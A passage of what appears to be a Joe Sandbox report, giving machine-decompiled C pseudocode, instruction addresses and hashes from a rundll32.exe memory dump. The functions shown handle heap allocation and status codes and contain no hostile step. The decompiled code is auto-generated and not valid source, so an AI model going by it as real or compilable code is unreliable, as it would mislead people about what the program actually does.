                                                                                            				signed int _t226;
                                                                                            				intOrPtr _t228;
                                                                                            				signed int _t232;
                                                                                            				signed int _t233;
                                                                                            				signed int _t234;
                                                                                            				void* _t237;
                                                                                            				void* _t238;
                                                                                            
                                                                                            				_t236 = __esi;
                                                                                            				_t235 = __edi;
                                                                                            				_t193 = __ebx;
                                                                                            				_push(0x70);
                                                                                            				_push(0x46af9c0);
                                                                                            				E0462D0E8(__ebx, __edi, __esi);
                                                                                            				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
                                                                                            				if( *0x46c7b04 == 0) {
                                                                                            					L4:
                                                                                            					goto L5;
                                                                                            				} else {
                                                                                            					_t136 = E045ECEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
                                                                                            					_t236 = 0;
                                                                                            					if(_t136 < 0) {
                                                                                            						 *((intOrPtr*)(_t237 - 0x54)) = 0;
                                                                                            					}
                                                                                            					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
                                                                                            						_t193 =  *( *[fs:0x30] + 0x18);
                                                                                            						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
                                                                                            						 *(_t237 - 0x68) = _t236;
                                                                                            						 *(_t237 - 0x6c) = _t236;
                                                                                            						_t235 = _t236;
                                                                                            						 *(_t237 - 0x60) = _t236;
                                                                                            						E045F2280( *[fs:0x30], 0x46c8550);
                                                                                            						_t139 =  *0x46c7b04; // 0x1
                                                                                            						__eflags = _t139 - 1;
                                                                                            						if(__eflags != 0) {
                                                                                            							_t200 = 0xc;
                                                                                            							_t201 = _t237 - 0x40;
                                                                                            							_t141 = E0460F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
                                                                                            							 *(_t237 - 0x44) = _t141;
                                                                                            							__eflags = _t141;
                                                                                            							if(_t141 < 0) {
                                                                                            								L50:
                                                                                            								E045EFFB0(_t193, _t235, 0x46c8550);
                                                                                            								L5:
                                                                                            								return E0462D130(_t193, _t235, _t236);
                                                                                            							}
                                                                                            							_push(_t201);
                                                                                            							_t221 = 0x10;
                                                                                            							_t202 =  *(_t237 - 0x40);
                                                                                            							_t145 = E045D1C45( *(_t237 - 0x40), _t221);
                                                                                            							 *(_t237 - 0x44) = _t145;
                                                                                            							__eflags = _t145;
                                                                                            							if(_t145 < 0) {
                                                                                            								goto L50;
                                                                                            							}
                                                                                            							_t146 =  *0x46c7b9c; // 0x0
                                                                                            							_t235 = L045F4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
                                                                                            							 *(_t237 - 0x60) = _t235;
                                                                                            							__eflags = _t235;
                                                                                            							if(_t235 == 0) {
                                                                                            								_t149 = 0xc0000017;
                                                                                            								 *(_t237 - 0x44) = 0xc0000017;
                                                                                            							} else {
                                                                                            								_t149 =  *(_t237 - 0x44);
                                                                                            							}
                                                                                            							__eflags = _t149;
                                                                                            							if(__eflags >= 0) {
                                                                                            								L8:
                                                                                            								 *(_t237 - 0x64) = _t235;
                                                                                            								_t150 =  *0x46c7b10; // 0x9
                                                                                            								 *(_t237 - 0x4c) = _t150;
                                                                                            								_push(_t237 - 0x74);
                                                                                            								_push(_t237 - 0x39);
                                                                                            								_push(_t237 - 0x58);
                                                                                            								_t193 = E0460A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
                                                                                            								 *(_t237 - 0x44) = _t193;
                                                                                            								__eflags = _t193;
                                                                                            								if(_t193 < 0) {
                                                                                            									L30:
                                                                                            									E045EFFB0(_t193, _t235, 0x46c8550);
                                                                                            									__eflags = _t235 - _t237 - 0x38;
                                                                                            									if(_t235 != _t237 - 0x38) {
                                                                                            										_t235 =  *(_t237 - 0x48);
                                                                                            										L045F77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
                                                                                            									} else {
                                                                                            										_t235 =  *(_t237 - 0x48);
                                                                                            									}
                                                                                            									__eflags =  *(_t237 - 0x6c);
                                                                                            									if( *(_t237 - 0x6c) != 0) {
                                                                                            										L045F77F0(_t235, _t236,  *(_t237 - 0x6c));
                                                                                            									}
                                                                                            									__eflags = _t193;
                                                                                            									if(_t193 >= 0) {
                                                                                            										goto L4;
                                                                                            									} else {
                                                                                            										goto L5;
                                                                                            									}
                                                                                            								}
                                                                                            								_t204 =  *0x46c7b04; // 0x1
                                                                                            								 *(_t235 + 8) = _t204;
                                                                                            								__eflags =  *((char*)(_t237 - 0x39));
                                                                                            								if( *((char*)(_t237 - 0x39)) != 0) {
                                                                                            									 *(_t235 + 4) = 1;
                                                                                            									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
                                                                                            									_t161 =  *0x46c7b10; // 0x9
                                                                                            									 *(_t237 - 0x4c) = _t161;
                                                                                            								} else {
                                                                                            									 *(_t235 + 4) = _t236;
                                                                                            									 *(_t235 + 0xc) =  *(_t237 - 0x58);
                                                                                            								}
                                                                                            								 *((intOrPtr*)(_t237 - 0x54)) = E046137C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
                                                                                            								_t224 = _t236;
                                                                                            								 *(_t237 - 0x40) = _t236;
                                                                                            								 *(_t237 - 0x50) = _t236;
                                                                                            								while(1) {
                                                                                            									_t163 =  *(_t235 + 8);
                                                                                            									__eflags = _t224 - _t163;
                                                                                            									if(_t224 >= _t163) {
                                                                                            										break;
                                                                                            									}
                                                                                            									_t228 =  *0x46c7b9c; // 0x0
                                                                                            									_t214 = L045F4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
                                                                                            									 *(_t237 - 0x78) = _t214;
                                                                                            									__eflags = _t214;
                                                                                            									if(_t214 == 0) {
                                                                                            										L52:
                                                                                            										_t193 = 0xc0000017;
                                                                                            										L19:
                                                                                            										 *(_t237 - 0x44) = _t193;
                                                                                            										L20:
                                                                                            										_t206 =  *(_t237 - 0x40);
                                                                                            										__eflags = _t206;
                                                                                            										if(_t206 == 0) {
                                                                                            											L26:
                                                                                            											__eflags = _t193;
                                                                                            											if(_t193 < 0) {
                                                                                            												E046137F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
                                                                                            												__eflags =  *((char*)(_t237 - 0x39));
                                                                                            												if( *((char*)(_t237 - 0x39)) != 0) {
                                                                                            													 *0x46c7b10 =  *0x46c7b10 - 8;
                                                                                            												}
                                                                                            											} else {
                                                                                            												_t169 =  *(_t237 - 0x68);
                                                                                            												__eflags = _t169;
                                                                                            												if(_t169 != 0) {
                                                                                            													 *0x46c7b04 =  *0x46c7b04 - _t169;
                                                                                            												}
                                                                                            											}
                                                                                            											__eflags = _t193;
                                                                                            											if(_t193 >= 0) {
                                                                                            												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
                                                                                            											}
                                                                                            											goto L30;
                                                                                            										}
                                                                                            										_t226 = _t206 * 0xc;
                                                                                            										__eflags = _t226;
                                                                                            										_t194 =  *(_t237 - 0x48);
                                                                                            										do {
                                                                                            											 *(_t237 - 0x40) = _t206 - 1;
                                                                                            											_t226 = _t226 - 0xc;
                                                                                            											 *(_t237 - 0x4c) = _t226;
                                                                                            											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
                                                                                            											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
                                                                                            												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
                                                                                            												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
                                                                                            													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
                                                                                            													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                                                                                            													__eflags =  *((char*)(_t237 - 0x39));
                                                                                            													if( *((char*)(_t237 - 0x39)) == 0) {
                                                                                            														_t171 = _t210;
                                                                                            													} else {
                                                                                            														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
                                                                                            														L045F77F0(_t194, _t236, _t210 - 8);
                                                                                            														_t171 =  *(_t237 - 0x50);
                                                                                            													}
                                                                                            													L48:
                                                                                            													L045F77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
                                                                                            													L46:
                                                                                            													_t206 =  *(_t237 - 0x40);
                                                                                            													_t226 =  *(_t237 - 0x4c);
                                                                                            													goto L24;
                                                                                            												}
                                                                                            												 *0x46c7b08 =  *0x46c7b08 + 1;
                                                                                            												goto L24;
                                                                                            											}
                                                                                            											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                                                                                            											__eflags = _t171;
                                                                                            											if(_t171 != 0) {
                                                                                            												__eflags =  *((char*)(_t237 - 0x39));
                                                                                            												if( *((char*)(_t237 - 0x39)) == 0) {
                                                                                            													goto L48;
                                                                                            												}
                                                                                            												E046157C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
                                                                                            												goto L46;
                                                                                            											}
                                                                                            											L24:
                                                                                            											__eflags = _t206;
                                                                                            										} while (_t206 != 0);
                                                                                            										_t193 =  *(_t237 - 0x44);
                                                                                            										goto L26;
                                                                                            									}
                                                                                            									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
                                                                                            									 *(_t237 - 0x7c) = _t232;
                                                                                            									 *(_t232 - 4) = _t214;
                                                                                            									 *(_t237 - 4) = _t236;
                                                                                            									E0461F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
                                                                                            									_t238 = _t238 + 0xc;
                                                                                            									 *(_t237 - 4) = 0xfffffffe;
                                                                                            									_t215 =  *(_t237 - 0x48);
                                                                                            									__eflags = _t193;
                                                                                            									if(_t193 < 0) {
                                                                                            										L045F77F0(_t215, _t236,  *(_t237 - 0x78));
                                                                                            										goto L20;
                                                                                            									}
                                                                                            									__eflags =  *((char*)(_t237 - 0x39));
                                                                                            									if( *((char*)(_t237 - 0x39)) != 0) {
                                                                                            										_t233 = E0460A44B( *(_t237 - 0x4c));
                                                                                            										 *(_t237 - 0x50) = _t233;
                                                                                            										__eflags = _t233;
                                                                                            										if(_t233 == 0) {
                                                                                            											L045F77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
                                                                                            											goto L52;
                                                                                            										}
                                                                                            										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
                                                                                            										L17:
                                                                                            										_t234 =  *(_t237 - 0x40);
                                                                                            										_t218 = _t234 * 0xc;
                                                                                            										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
                                                                                            										 *(_t218 + _t235 + 0x10) = _t236;
                                                                                            										_t224 = _t234 + 1;
                                                                                            										 *(_t237 - 0x40) = _t224;
                                                                                            										 *(_t237 - 0x50) = _t224;
                                                                                            										_t193 =  *(_t237 - 0x44);
                                                                                            										continue;
                                                                                            									}
                                                                                            									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
                                                                                            									goto L17;
                                                                                            								}
                                                                                            								 *_t235 = _t236;
                                                                                            								_t165 = 0x10 + _t163 * 0xc;
                                                                                            								__eflags = _t165;
                                                                                            								_push(_t165);
                                                                                            								_push(_t235);
                                                                                            								_push(0x23);
                                                                                            								_push(0xffffffff);
                                                                                            								_t193 = E046196C0();
                                                                                            								goto L19;
                                                                                            							} else {
                                                                                            								goto L50;
                                                                                            							}
                                                                                            						}
                                                                                            						_t235 = _t237 - 0x38;
                                                                                            						 *(_t237 - 0x60) = _t235;
                                                                                            						goto L8;
                                                                                            					}
                                                                                            					goto L4;
                                                                                            				}
                                                                                            			}

































                                                                                            0x04639b1b
                                                                                            0x04639b1b
                                                                                            0x045e862e
                                                                                            0x045e862e
                                                                                            0x045e8631
                                                                                            0x045e8631
                                                                                            0x045e8634
                                                                                            0x045e8636
                                                                                            0x045e8669
                                                                                            0x045e8669
                                                                                            0x045e866b
                                                                                            0x04639bbf
                                                                                            0x04639bc4
                                                                                            0x04639bc8
                                                                                            0x04639bce
                                                                                            0x04639bce
                                                                                            0x045e8671
                                                                                            0x045e8671
                                                                                            0x045e8674
                                                                                            0x045e8676
                                                                                            0x04639bae
                                                                                            0x04639bae
                                                                                            0x045e8676
                                                                                            0x045e867c
                                                                                            0x045e867e
                                                                                            0x045e8688
                                                                                            0x045e8688
                                                                                            0x00000000
                                                                                            0x045e867e
                                                                                            0x045e8638
                                                                                            0x045e8638
                                                                                            0x045e863b
                                                                                            0x045e863e
                                                                                            0x045e863f
                                                                                            0x045e8642
                                                                                            0x045e8645
                                                                                            0x045e8648
                                                                                            0x045e864d
                                                                                            0x04639b69
                                                                                            0x04639b6e
                                                                                            0x04639b7b
                                                                                            0x04639b81
                                                                                            0x04639b85
                                                                                            0x04639b89
                                                                                            0x04639ba7
                                                                                            0x04639b8b
                                                                                            0x04639b91
                                                                                            0x04639b9a
                                                                                            0x04639b9f
                                                                                            0x04639b9f
                                                                                            0x045e8788
                                                                                            0x045e878d
                                                                                            0x045e8763
                                                                                            0x045e8763
                                                                                            0x045e8766
                                                                                            0x00000000
                                                                                            0x045e8766
                                                                                            0x04639b70
                                                                                            0x00000000
                                                                                            0x04639b70
                                                                                            0x045e8656
                                                                                            0x045e865a
                                                                                            0x045e865c
                                                                                            0x045e8752
                                                                                            0x045e8756
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045e875e
                                                                                            0x00000000
                                                                                            0x045e875e
                                                                                            0x045e8662
                                                                                            0x045e8662
                                                                                            0x045e8662
                                                                                            0x045e8666
                                                                                            0x00000000
                                                                                            0x045e8666
                                                                                            0x045e85b7
                                                                                            0x045e85b9
                                                                                            0x045e85bc
                                                                                            0x045e85bf
                                                                                            0x045e85cc
                                                                                            0x045e85d1
                                                                                            0x045e85d4
                                                                                            0x045e85db
                                                                                            0x045e85de
                                                                                            0x045e85e0
                                                                                            0x04639b5f
                                                                                            0x00000000
                                                                                            0x04639b5f
                                                                                            0x045e85e6
                                                                                            0x045e85ea
                                                                                            0x045e86c3
                                                                                            0x045e86c5
                                                                                            0x045e86c8
                                                                                            0x045e86ca
                                                                                            0x04639b16
                                                                                            0x00000000
                                                                                            0x04639b16
                                                                                            0x045e86d6
                                                                                            0x045e85f6
                                                                                            0x045e85f6
                                                                                            0x045e85f9
                                                                                            0x045e8602
                                                                                            0x045e8606
                                                                                            0x045e860a
                                                                                            0x045e860b
                                                                                            0x045e860e
                                                                                            0x045e8611
                                                                                            0x00000000
                                                                                            0x045e8611
                                                                                            0x045e85f3
                                                                                            0x00000000
                                                                                            0x045e85f3
                                                                                            0x045e8619
                                                                                            0x045e861e
                                                                                            0x045e861e
                                                                                            0x045e8621
                                                                                            0x045e8622
                                                                                            0x045e8623
                                                                                            0x045e8625
                                                                                            0x045e862c
                                                                                            0x00000000
                                                                                            0x045e873d
                                                                                            0x00000000
                                                                                            0x045e873d
                                                                                            0x045e8737
                                                                                            0x045e850f
                                                                                            0x045e8512
                                                                                            0x00000000
                                                                                            0x045e8512
                                                                                            0x00000000
                                                                                            0x045e84d6

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c0b22f1adc3e440b8c2288e254dbb587d09294b1c5670282911b912d85d2e14e
                                                                                            • Instruction ID: be239e95e6bf682eee34f0cb6f057595a71d3fa640b79c98438de0765191a3ec
                                                                                            • Opcode Fuzzy Hash: c0b22f1adc3e440b8c2288e254dbb587d09294b1c5670282911b912d85d2e14e
                                                                                            • Instruction Fuzzy Hash: 19B13AB0E00249DFDB18DF9AC984AAEBBB5FF58304F144529E416AB241E770B945DF90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 67%
                                                                                            			E0460513A(intOrPtr __ecx, void* __edx) {
                                                                                            				signed int _v8;
                                                                                            				signed char _v16;
                                                                                            				intOrPtr _v20;
                                                                                            				intOrPtr _v24;
                                                                                            				char _v28;
                                                                                            				signed int _v32;
                                                                                            				signed int _v36;
                                                                                            				signed int _v40;
                                                                                            				intOrPtr _v44;
                                                                                            				intOrPtr _v48;
                                                                                            				char _v63;
                                                                                            				char _v64;
                                                                                            				signed int _v72;
                                                                                            				signed int _v76;
                                                                                            				signed int _v80;
                                                                                            				signed int _v84;
                                                                                            				signed int _v88;
                                                                                            				signed char* _v92;
                                                                                            				signed int _v100;
                                                                                            				signed int _v104;
                                                                                            				char _v105;
                                                                                            				void* __ebx;
                                                                                            				void* __edi;
                                                                                            				void* __esi;
                                                                                            				void* _t157;
                                                                                            				signed int _t159;
                                                                                            				signed int _t160;
                                                                                            				unsigned int* _t161;
                                                                                            				intOrPtr _t165;
                                                                                            				signed int _t172;
                                                                                            				signed char* _t181;
                                                                                            				intOrPtr _t189;
                                                                                            				intOrPtr* _t200;
                                                                                            				signed int _t202;
                                                                                            				signed int _t203;
                                                                                            				char _t204;
                                                                                            				signed int _t207;
                                                                                            				signed int _t208;
                                                                                            				void* _t209;
                                                                                            				intOrPtr _t210;
                                                                                            				signed int _t212;
                                                                                            				signed int _t214;
                                                                                            				signed int _t221;
                                                                                            				signed int _t222;
                                                                                            				signed int _t226;
                                                                                            				intOrPtr* _t232;
                                                                                            				signed int _t233;
                                                                                            				signed int _t234;
                                                                                            				intOrPtr _t237;
                                                                                            				intOrPtr _t238;
                                                                                            				intOrPtr _t240;
                                                                                            				void* _t245;
                                                                                            				signed int _t246;
                                                                                            				signed int _t247;
                                                                                            				void* _t248;
                                                                                            				void* _t251;
                                                                                            				void* _t252;
                                                                                            				signed int _t253;
                                                                                            				signed int _t255;
                                                                                            				signed int _t256;
                                                                                            
                                                                                            				_t255 = (_t253 & 0xfffffff8) - 0x6c;
                                                                                            				_v8 =  *0x46cd360 ^ _t255;
                                                                                            				_v32 = _v32 & 0x00000000;
                                                                                            				_t251 = __edx;
                                                                                            				_t237 = __ecx;
                                                                                            				_t212 = 6;
                                                                                            				_t245 =  &_v84;
                                                                                            				_t207 =  *((intOrPtr*)(__ecx + 0x48));
                                                                                            				_v44 =  *((intOrPtr*)(__edx + 0xc8));
                                                                                            				_v48 = __ecx;
                                                                                            				_v36 = _t207;
                                                                                            				_t157 = memset(_t245, 0, _t212 << 2);
                                                                                            				_t256 = _t255 + 0xc;
                                                                                            				_t246 = _t245 + _t212;
                                                                                            				if(_t207 == 2) {
                                                                                            					_t247 =  *(_t237 + 0x60);
                                                                                            					_t208 =  *(_t237 + 0x64);
                                                                                            					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
                                                                                            					_t159 =  *((intOrPtr*)(_t237 + 0x58));
                                                                                            					_v104 = _t159;
                                                                                            					_v76 = _t159;
                                                                                            					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
                                                                                            					_v100 = _t160;
                                                                                            					_v72 = _t160;
                                                                                            					L19:
                                                                                            					_v80 = _t208;
                                                                                            					_v84 = _t247;
                                                                                            					L8:
                                                                                            					_t214 = 0;
                                                                                            					if( *(_t237 + 0x74) > 0) {
                                                                                            						_t82 = _t237 + 0x84; // 0x124
                                                                                            						_t161 = _t82;
                                                                                            						_v92 = _t161;
                                                                                            						while( *_t161 >> 0x1f != 0) {
                                                                                            							_t200 = _v92;
                                                                                            							if( *_t200 == 0x80000000) {
                                                                                            								break;
                                                                                            							}
                                                                                            							_t214 = _t214 + 1;
                                                                                            							_t161 = _t200 + 0x10;
                                                                                            							_v92 = _t161;
                                                                                            							if(_t214 <  *(_t237 + 0x74)) {
                                                                                            								continue;
                                                                                            							}
                                                                                            							goto L9;
                                                                                            						}
                                                                                            						_v88 = _t214 << 4;
                                                                                            						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
                                                                                            						_t165 = 0;
                                                                                            						asm("adc eax, [ecx+edx+0x7c]");
                                                                                            						_v24 = _t165;
                                                                                            						_v28 = _v40;
                                                                                            						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
                                                                                            						_t221 = _v40;
                                                                                            						_v16 =  *_v92;
                                                                                            						_v32 =  &_v28;
                                                                                            						if( *(_t237 + 0x4e) >> 0xf == 0) {
                                                                                            							goto L9;
                                                                                            						}
                                                                                            						_t240 = _v48;
                                                                                            						if( *_v92 != 0x80000000) {
                                                                                            							goto L9;
                                                                                            						}
                                                                                            						 *((intOrPtr*)(_t221 + 8)) = 0;
                                                                                            						 *((intOrPtr*)(_t221 + 0xc)) = 0;
                                                                                            						 *((intOrPtr*)(_t221 + 0x14)) = 0;
                                                                                            						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
                                                                                            						_t226 = 0;
                                                                                            						_t181 = _t251 + 0x66;
                                                                                            						_v88 = 0;
                                                                                            						_v92 = _t181;
                                                                                            						do {
                                                                                            							if( *((char*)(_t181 - 2)) == 0) {
                                                                                            								goto L31;
                                                                                            							}
                                                                                            							_t226 = _v88;
                                                                                            							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
                                                                                            								_t181 = E0461D0F0(1, _t226 + 0x20, 0);
                                                                                            								_t226 = _v40;
                                                                                            								 *(_t226 + 8) = _t181;
                                                                                            								 *((intOrPtr*)(_t226 + 0xc)) = 0;
                                                                                            								L34:
                                                                                            								if(_v44 == 0) {
                                                                                            									goto L9;
                                                                                            								}
                                                                                            								_t210 = _v44;
                                                                                            								_t127 = _t210 + 0x1c; // 0x1c
                                                                                            								_t249 = _t127;
                                                                                            								E045F2280(_t181, _t127);
                                                                                            								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
                                                                                            								_t185 =  *((intOrPtr*)(_t210 + 0x94));
                                                                                            								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
                                                                                            									L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
                                                                                            								}
                                                                                            								_t189 = L045F4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
                                                                                            								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
                                                                                            								if(_t189 != 0) {
                                                                                            									 *((intOrPtr*)(_t189 + 8)) = _v20;
                                                                                            									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
                                                                                            									_t232 =  *((intOrPtr*)(_t210 + 0x94));
                                                                                            									 *_t232 = _t232 + 0x10;
                                                                                            									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
                                                                                            									E0461F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
                                                                                            									_t256 = _t256 + 0xc;
                                                                                            								}
                                                                                            								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
                                                                                            								E045EFFB0(_t210, _t249, _t249);
                                                                                            								_t222 = _v76;
                                                                                            								_t172 = _v80;
                                                                                            								_t208 = _v84;
                                                                                            								_t247 = _v88;
                                                                                            								L10:
                                                                                            								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
                                                                                            								_v44 = _t238;
                                                                                            								if(_t238 != 0) {
                                                                                            									 *0x46cb1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
                                                                                            									_v44();
                                                                                            								}
                                                                                            								_pop(_t248);
                                                                                            								_pop(_t252);
                                                                                            								_pop(_t209);
                                                                                            								return E0461B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
                                                                                            							}
                                                                                            							_t181 = _v92;
                                                                                            							L31:
                                                                                            							_t226 = _t226 + 1;
                                                                                            							_t181 =  &(_t181[0x18]);
                                                                                            							_v88 = _t226;
                                                                                            							_v92 = _t181;
                                                                                            						} while (_t226 < 4);
                                                                                            						goto L34;
                                                                                            					}
                                                                                            					L9:
                                                                                            					_t172 = _v104;
                                                                                            					_t222 = _v100;
                                                                                            					goto L10;
                                                                                            				}
                                                                                            				_t247 = _t246 | 0xffffffff;
                                                                                            				_t208 = _t247;
                                                                                            				_v84 = _t247;
                                                                                            				_v80 = _t208;
                                                                                            				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
                                                                                            					_t233 = _v72;
                                                                                            					_v105 = _v64;
                                                                                            					_t202 = _v76;
                                                                                            				} else {
                                                                                            					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
                                                                                            					_v105 = 1;
                                                                                            					if(_v63 <= _t204) {
                                                                                            						_v63 = _t204;
                                                                                            					}
                                                                                            					_t202 = _v76 |  *(_t251 + 0x40);
                                                                                            					_t233 = _v72 |  *(_t251 + 0x44);
                                                                                            					_t247 =  *(_t251 + 0x38);
                                                                                            					_t208 =  *(_t251 + 0x3c);
                                                                                            					_v76 = _t202;
                                                                                            					_v72 = _t233;
                                                                                            					_v84 = _t247;
                                                                                            					_v80 = _t208;
                                                                                            				}
                                                                                            				_v104 = _t202;
                                                                                            				_v100 = _t233;
                                                                                            				if( *((char*)(_t251 + 0xc4)) != 0) {
                                                                                            					_t237 = _v48;
                                                                                            					_v105 = 1;
                                                                                            					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
                                                                                            						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
                                                                                            						_t237 = _v48;
                                                                                            					}
                                                                                            					_t203 = _t202 |  *(_t251 + 0xb8);
                                                                                            					_t234 = _t233 |  *(_t251 + 0xbc);
                                                                                            					_t247 = _t247 &  *(_t251 + 0xb0);
                                                                                            					_t208 = _t208 &  *(_t251 + 0xb4);
                                                                                            					_v104 = _t203;
                                                                                            					_v76 = _t203;
                                                                                            					_v100 = _t234;
                                                                                            					_v72 = _t234;
                                                                                            					_v84 = _t247;
                                                                                            					_v80 = _t208;
                                                                                            				}
                                                                                            				if(_v105 == 0) {
                                                                                            					_v36 = _v36 & 0x00000000;
                                                                                            					_t208 = 0;
                                                                                            					_t247 = 0;
                                                                                            					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
                                                                                            					goto L19;
                                                                                            				} else {
                                                                                            					_v36 = 1;
                                                                                            					goto L8;
                                                                                            				}
                                                                                            			}































































                                                                                            0x04646e0d
                                                                                            0x04646e11
                                                                                            0x04646e11
                                                                                            0x046051eb
                                                                                            0x04646e1a
                                                                                            0x04646e1f
                                                                                            0x04646e21
                                                                                            0x04646e23
                                                                                            0x00000000
                                                                                            0x046051f1
                                                                                            0x046051f1
                                                                                            0x00000000
                                                                                            0x046051f1

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • Opcode ID: fb234aac2c11dd14063d2574a4fdc6d476c3987d1b429d3eb721c570997846cd
                                                                                            • Instruction ID: d1c2119b99573705864d0776c3b39d0c9e715a3c160306cd3ecf50660cc7fc61
                                                                                            • Opcode Fuzzy Hash: fb234aac2c11dd14063d2574a4fdc6d476c3987d1b429d3eb721c570997846cd
                                                                                            • Instruction Fuzzy Hash: A2C133756083809FD754CF28C480A5AFBE1BF89308F14896EF9998B392E775E945CF42
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 74%
                                                                                            			E046003E2(signed int __ecx, signed int __edx) {
                                                                                            				signed int _v8;
                                                                                            				signed int _v12;
                                                                                            				signed int _v16;
                                                                                            				signed int _v20;
                                                                                            				signed int _v24;
                                                                                            				signed int _v28;
                                                                                            				signed int _v32;
                                                                                            				signed int _v36;
                                                                                            				intOrPtr _v40;
                                                                                            				signed int _v44;
                                                                                            				signed int _v48;
                                                                                            				char _v52;
                                                                                            				char _v56;
                                                                                            				char _v64;
                                                                                            				void* __ebx;
                                                                                            				void* __edi;
                                                                                            				void* __esi;
                                                                                            				signed int _t56;
                                                                                            				signed int _t58;
                                                                                            				char* _t64;
                                                                                            				intOrPtr _t65;
                                                                                            				signed int _t74;
                                                                                            				signed int _t79;
                                                                                            				char* _t83;
                                                                                            				intOrPtr _t84;
                                                                                            				signed int _t93;
                                                                                            				signed int _t94;
                                                                                            				signed char* _t95;
                                                                                            				signed int _t99;
                                                                                            				signed int _t100;
                                                                                            				signed char* _t101;
                                                                                            				signed int _t105;
                                                                                            				signed int _t119;
                                                                                            				signed int _t120;
                                                                                            				void* _t122;
                                                                                            				signed int _t123;
                                                                                            				signed int _t127;
                                                                                            
                                                                                            				_v8 =  *0x46cd360 ^ _t127;
                                                                                            				_t119 = __ecx;
                                                                                            				_t105 = __edx;
                                                                                            				_t118 = 0;
                                                                                            				_v20 = __edx;
                                                                                            				_t120 =  *(__ecx + 0x20);
                                                                                            				if(E04600548(__ecx, 0) != 0) {
                                                                                            					_t56 = 0xc000022d;
                                                                                            					L23:
                                                                                            					return E0461B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
                                                                                            				} else {
